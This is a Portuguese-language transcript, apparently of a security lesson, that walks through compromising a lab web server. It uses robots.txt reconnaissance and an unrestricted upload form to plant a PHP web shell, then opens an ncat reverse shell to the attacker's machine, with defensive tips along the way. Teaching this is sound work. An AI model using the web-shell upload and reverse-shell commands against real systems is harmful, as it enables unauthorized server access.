Bom pessoal, vou fazer o seguinte aqui, eu vou acessar esse site aqui, http //172.30.040. Eu estou entrando nesse site aqui, eu fui avisado que ele foi desativado. O que eu posso fazer aqui é clicar em View Page Source para olhar o código-fonte dessa página. Eu não vejo nenhuma informação aqui, só vejo a informação que o site foi desativado. Uma outra coisa que eu posso fazer aqui nesse caso também, para buscar informações a respeito desse sistema, é tentar acessar esse arquivo aqui, que é o robots.txt. Esse arquivo, o robots.txt, ele funciona como um filtro para os robôs, os bots dos sites de busca, e faz com que os programadores possam controlar as permissões a determinadas páginas ou pastas do site. Em resumo, esse arquivo aqui ele controla qual informação do site ou do sistema vai poder ser indexado nos mecanismos de busca aí, como o Google, por exemplo, o Bing da Microsoft, o DuckDuckGo, entre outros buscadores também. Uma dica que eu posso dar para vocês, pessoal, é assim: como melhor prática de segurança é manter esse arquivo com a menor quantidade possível de registro. E quando usar aqui algum caminho ou coisa do gênero, não utilizar de forma alguma diretórios sensíveis ou arquivos sensíveis, porque com certeza esse arquivo robots.txt ele vai ser de conhecimento da internet, tá? É de praxe atacantes usarem esse arquivo aí para conseguir informações. Então, quanto menos possível informação nesse arquivo do robots.txt, melhor. É claro que assim, você pode colocar um diretório, ele vai ter a contrapartida de não ser indexado por um bot específico do site de busca, mas de repente você corre risco de colocar uma informação que o atacante pode estar utilizando. Então, o robots.txt ele tem que ser usado de uma forma que ele seja a última solução e não seja a primeira solução. Então, se você conseguir dar uma solução nesse tipo de coisa de indexação por dentro do sistema, por algum controle de uma ferramenta de infraestrutura ou segurança, é muito melhor do que utilizar o robots.txt, tá? Então, é sempre importante estar dando uma revisada em todos os robots.txt de todos os sistemas na internet. Então aqui eu encontrei apenas uma entrada, mas justamente essa entrada aqui é o que vai levar a gente para o próximo caminho, tá pessoal? Que é o underline old. Então o que eu vou fazer? Eu vou jogar aqui o underline old e vou dar um enter. E a gente retratou nesse episódio aí do robots.txt uma expressão, né, que a gente usa, que é bastante comum em segurança, que é segurança por obscuridade. A gente acabou colocando um diretório sensível que vai levar informação e acessibilidade para um atacante. Então eu caí aqui no site da Dextor e eu estou vendo que a Dextor é um site, né? É um sistema
de cupom de desconto, né? Então, o que eu posso estar fazendo aqui é analisar todos os links, analisar essa página, a procura de informação que possa me levar a um outro lugar interessante aí, né? Então, uma das primeiras coisas que o atacante faz é colocar aqui o ponteiro do mouse em cima de todos os links, né? Então ele vê aqui no rodapé, a gente pode estar vendo aqui no rodapé que existe o path, o caminho, para onde esse link vai levar. Então ele procura parâmetros nessas URLs, parâmetros que possam ser alterados, enfim. Um atacante ele procura, por exemplo, vamos clicar aqui sobre nós, vamos entrar nessa página aqui sobre nós. Então, por exemplo, eu poderia estar alterando aqui de repente para um nome de uma página que não é existente, para provocar situações em que de repente o desenvolvedor ele não tenha se atentado e não tenha especificado dentro do ambiente dele, para procurar situações em que me gere uma mensagem de erro, que possa me dar algum tipo de informação. Então, tudo que o atacante ele procura fazer certas ações que o desenvolvedor ele não teria previsto, para gerar informação, enfim, para gerar situações que o desenvolvedor não conseguiu prever dentro do sistema dele. Então isso é praxe também. Então aqui fora essa passagem de um nome de um site inexistente, eu posso fazer um injection também. Então, por exemplo, passando essas aspas aqui simples, eu conseguiria ver se de repente por dentro desse input aqui na URL do site, isso aqui é vulnerável a SQL injection, esse parâmetro aqui. Então não me deu nenhum tipo de informação. Eu vou testar todos os inputs. Eu poderia estar usando não só também esse parâmetro de injection também, mas por exemplo, está tentando fazer ataques de XSS, Cross-Site Script, enfim, outros ataques. O que a gente tem que se atentar e tirar direção nisso é que todo input é malicioso. Uma regra aí que a gente tem que sempre usar é que a gente nunca pode aceitar input confiável do usuário. Então tudo que vir a gente tem que tratar, tem que sanitizar, enfim, na entrada, na saída, na parte de codificação, na parte de geração de erros. A gente tem muito erro gerado a partir de mensagens de erros, muita informação para o atacante, informações de versões, informações de plataforma, então a gente tem que se atentar com esse tipo de coisa. Então a gente acessou aqui o sobre nós, a gente não acabou encontrando muitas coisas. Aqui eu vou dar uma olhada em View Page Source, eu vou dar uma olhada no código fonte da página para ver se a gente consegue achar algum tipo de informação que seria interessante para a gente. Vamos dar uma analisada aqui. Aparentemente tem um JavaScript aqui, deixa eu dar uma olhada. Aparentemente não tem nada que eu poderia estar utilizando. Uma outra coisa também, pessoal, é o seguinte: geralmente o atacante ele gosta de vir aqui nessas seções aqui de contato, onde ele vai ter a maior quantidade de inputs. Então, por exemplo, todos esses campos aqui é interessante para ele ficar fazendo injection, fazendo, enfim, colocando parâmetros de JavaScript para testar, para ver se o desenvolvedor sanitizou todos esses campos de maneira correta. Então, tudo quanto é campo de input, eu devo me preocupar bastante dentro do meu sistema. Vamos fazer o seguinte, vamos entrar também no código-fonte aqui dessa parte do contato e eu vou procurar algum tipo de informação que possa nos levar a um outro nível. Vamos ver aqui. Uma coisa interessante aqui, pessoal, é essas duas linhas aqui, ó. Que eu tô vendo aqui? Uma coisa interessante é que essa página aqui do
da ação aqui do Action, contato 2.php, se a gente ver aqui na estrutura do site, não existe nada remetendo, nenhum link está remetendo para esse contato 2.php. É uma coisa que pode ser estranha. É uma coisa que não existe aqui, que não está dentro do site, então pode ser um escopo que eu tenho que analisar. E um outro fato também, que acontece bastante, é aqui eu tenho um comentário aqui, né? Eu tô vendo que tem um campo de input aqui, que ele submete um arquivo. Então é como se fosse um campo de upload, né? Então isso eu posso estar analisando também. E eu vejo aqui que isso tudo é feito através do método post, né? Então eu vou pegar esse contato 2.php aqui, eu vou dar um copy e vou jogar aqui. Contato 2. Opa, vamos voltar aqui. Deixa eu tirar essa página aqui. Contato 2.php. Deixa eu apagar essa parte aqui. Aqui. Vou deixar o load. E vou entrar aqui. Então o que eu vi aqui, pessoal? A gente colocou aqui, né? 172.30.040 underline old. E a gente tem um contato 2.php, que realmente é um campo de upload, né? Que eu posso estar tentando subir um arquivo. Esses campos de upload a gente tem que tomar bastante cuidado, porque é um desafio enorme em matéria de contramedida de segurança. Existem milhões, várias formas da gente bypassar tudo quanto é tipo de controle que a gente coloca aqui, por extensão, enfim, tudo quanto é tipo de controle que a gente utiliza para um campo de upload. Em geral, a regra geral, se a gente puder evitar colocar campo de upload, melhor. Então o que eu posso tentar fazer? Eu posso tentar bypassar ou tentar ver como que está o controle desse tipo de funcionalidade do campo de upload. Então eu vou fazer o seguinte, eu vou entrar aqui no meu shell aqui do Linux e aí eu vou fazer o seguinte, eu vou utilizar o Nano, que é o meu editor de textos aqui no Linux, e vou escrever um arquivo shell.php, tá? Então eu tenho aqui esse shell em PHP, em linguagem PHP, eu estou passando um comando de system, eu estou utilizando o método post e eu estou utilizando o CMD, tá? Eu já tenho esse shell aqui feito aqui, eu vou só sair, salvar, vou dar um Ctrl X e vou utilizar esse shell aqui para ver se a aplicação aceita, tá? Então vou dar um browse e vou selecionar esse shell.php e vou mandar esse shell.php. E aqui eu tô vendo que não existe nenhuma restrição nesse campo de upload, tá, pessoal? Ele foi aceito, o shell.php, e vou tentar verificar. Uma outra coisa que eu posso estar fazendo é verificar o path da onde esse shell.php foi, lá no servidor. Então vou clicar com o botão direito aqui do mouse, eu vou entrar no código fonte. Eu tô vendo que realmente foi feito o upload, foi incluso nesse path aqui, nesse caminho. Então vamos fazer o seguinte, como a nossa intenção é invadir o servidor, a gente conseguiu de fato tá fazendo o upload de um shell, né? O shell é um código malicioso. A gente pode estar encontrando o shell na internet, a gente pode baixar esse shell pronto em vários tipos de linguagem, enfim, vários tipos de extensões. Também tem como a gente renomear.
Enfim, tem diversas tratativas para esse tipo de situação, tá, pessoal? E aí eu vou fazer o seguinte. Uma coisa que eu estou notando aqui dentro dessa pasta aqui da onde o shell foi jogado é que há um comentário que foi feito include em post, em page post. Então isso aqui é uma informação também, esse tipo de comentário aqui para o atacante, tá, pessoal? Então o que que ocorre? Por exemplo, eu poderia estar tentando fazer alguma alteração aqui por método get, mas eu sei que não vai ser como o método do form aqui é em post. Eu tenho essa informação aqui também do page post. Eu sei que não vai ser assertivo se eu ficar tentando alguma abordagem por get. Então eu vou tentar fazer alguma tratativa, eu vou tentar fazer alguma requisição com relação a esse shell por post, tá, pessoal? Então aqui é uma informação que também meu sistema está dando. O sistema dá para um atacante. Então eu vou fazer o seguinte, eu vou voltar lá no meu terminal. Deixa eu limpar a tela aqui. E vou fazer o seguinte. Eu vou digitar cur. A gente vai fazer uma requisição via post para interagir com a shell no servidor, tá? Para tentar interagir com ela. Menos data. Vou abrir aspas duplas. cmd igual id. Vou dar um espaço aqui e vou colocar a URL do meu sistema, tá? 172.30.0.40 barra underline old barra upload barra shell.php. Basicamente esse é o caminho da onde a gente jogou o shell, tá, pessoal? Se a gente ver aqui, a gente pode ver que esse aqui é o caminho. E vou dar um enter. E aí ele gera aqui o ID para mim, tá, pessoal? Eu vou fazer o que? Depois que ele gerou esse ID, eu vou abrir uma nova tab aqui dentro do meu Linux, uma console aqui, e vou fazer o seguinte. Eu vou usar uma ferramenta chamada ncat e o parâmetro aqui VNLP na porta 443. O que eu estou fazendo aqui, tá, pessoal? Basicamente eu estou pegando na minha máquina, na máquina do usuário, e eu estou publicando uma porta, a porta 443. Eu estou deixando essa porta disponível, eu estou fazendo listening, que a gente chama aqui, né? Estou deixando ela disponível para conexão. Então basicamente todo sistema que tentar conectar, tentar falar com essa porta ou enviar algum arquivo para essa porta dentro da minha máquina, vai conseguir, porque eu estou publicando ela, né? Eu estou fazendo um listing dentro do meu próprio computador. Então eu vou fazer o seguinte também, eu vou abrir uma nova tab aqui e vou dar um ifconfig, que é o comando que vai mostrar o meu IP, e eu vou ter que tomar nota desse IP aqui da minha VPN, tá, pessoal? Que é o IP do meu computador. E aí eu vou fazer o seguinte. Agora eu vou fazer uma segunda requisição, só que agora eu vou utilizar o netcat, que é um canivete suíço, tá, pessoal? O netcat é muito utilizado para troubleshooting e por atacantes também, tá? Então eu vou tentar, através do netcat, se conectar no nosso endereço IP da minha máquina, que é esse endereço IP da VPN que eu acabei de ver, que eu dei o comando ifconfig, e através da porta que a gente publicou, que a gente deixou em lista, que é a porta 443, enviando um bash do servidor. O que é o bash? É basicamente esse modo de acesso aqui de terminal do Linux, tá, pessoal? Então eu vou tentar fazer uma conexão que a gente chama de conexão reversa, tá? É o shell reverso. Existem dois tipos de shell.
que o atacante pode utilizar o shell direto, que é o bind shell, que basicamente é uma conexão direta que o atacante se conecta ao servidor, e existe o shell reverso, que é o contrário, é fazer com que o servidor se conecte à máquina do atacante. É muito mais assertivo e muito melhor para um atacante utilizar um shell reverso, tá, pessoal? Porque geralmente tem uma má prática que administradores de sistemas, eles geralmente usam a parte de criação de regras de firewall dos servidores totalmente liberada, e eles não explicitam nenhum tipo de porta para saída. Então toda saída é liberada, todo o tráfego de saída dos servidores às vezes é todo liberado, e tem esse problema. Então eu conseguiria explorar, se eu fosse um atacante, para mim é muito melhor fazer um shell reverso, então eu tenho mais chance de invadir esse servidor. Então eu vou fazer o seguinte, eu vou utilizar o cur aqui novamente para fazer essa segunda requisição, é menos data. Eu vou abrir aspas aqui, duplas, vou utilizar o comando cmd, igual, vou utilizar o ncat e vou colocar um meu IP 172.20.161. E aí eu vou utilizar aquela porta que a gente está usando para listen na minha máquina. E aqui eu vou chamar o bin bash. Eu vou dar um barra bin barra bash. E vou fechar as aspas duplas. E agora aqui eu vou colocar o endereço do nosso servidor, tá? Onde eu quero que ele gere a conexão e se conecte com a minha máquina. 172.30.0.40 barra underline old barra upload barra novamente shell.php. Então vamos dar uma revisada aqui, cur, menos data, aspas duplas, cmd, chamei o ncat ali, coloquei o meu IP da minha máquina, a máquina do atacante, 172.20.161, porta 443, chamei o bin bash, invoquei o bin bash -e barra bin barra bash, fechei as aspas duplas, http 172.30.040 underline old upload shell.php, que é a minha localização. Então vou dar um enter aqui, e aí ele não me exibiu nenhuma informação, só que aqui a gente já pode ver que apareceu um connect 172.20.161 para 172.30.040. Aqui eu vou dar o comando id, e aí eu posso ver que gerou aqui o id igual a 33 www. Então se eu der um pwd aqui, eu já consigo ver o diretório onde estou dentro do servidor. Eu já estou dentro do servidor, tá, pessoal? Através desse shell reverso a gente conseguiu fechar a conexão com o servidor. Então se eu der um comando aqui, eu vou dar um ls, eu vejo que eu estou dentro do diretório, caí dentro do diretório onde eu enviei o shell. E se eu der também um outro comando aqui, o hostname, eu posso ver o nome da minha máquina, que é o server corp 04, que é esse servidor onde tem esse sistema aí de cupom de desconto. Então eu já consegui acesso a esse sistema, tá, pessoal? Tem uma outra coisa também, eu vou dar um romai aqui, que ele vai me exibir qual que é o tipo de acesso que eu tenho dentro desse servidor. É o www.data, que é um servidor específico de permissão de Apache. O que eu poderia estar fazendo aqui? Numa segunda fase desse ataque, eu posso tentar elevar meus privilégios, para tentar conseguir um privilégio de root, mas ainda assim com esse servidor de Apache eu consigo fazer muita coisa, eu consigo extrair informações, enfim, eu consigo ter tempo para levar esses meus privilégios para root, eu consigo entrar em muitos diretórios sensíveis, eu consigo uma porta aberta dentro dessa minha rede, para estar de repente, a partir de um servidor de web, a partir de um servidor de sistema, eu consigo escalar isso e chegar até um servidor de controlador de domínio, enfim. A gente pode fazer várias coisas.
Bom, pessoal, eu queria estar mostrando esse tipo de coisa aí. A gente conseguiu concluir com êxito aí que seria uma fase da invasão. A gente conseguiu achar um sistema de cupom de desconto e através de uma área específica a gente usou um campo de upload, a gente conseguiu inserir ali um shell.php, um arquivo malicioso, e através desse shell inserido dentro do sistema, a gente conseguiu interagir com esse shell e chamar esse shell, e a gente conseguiu fazer o que a gente chama de conexão reversa, que é o servidor se conectar à máquina do atacante.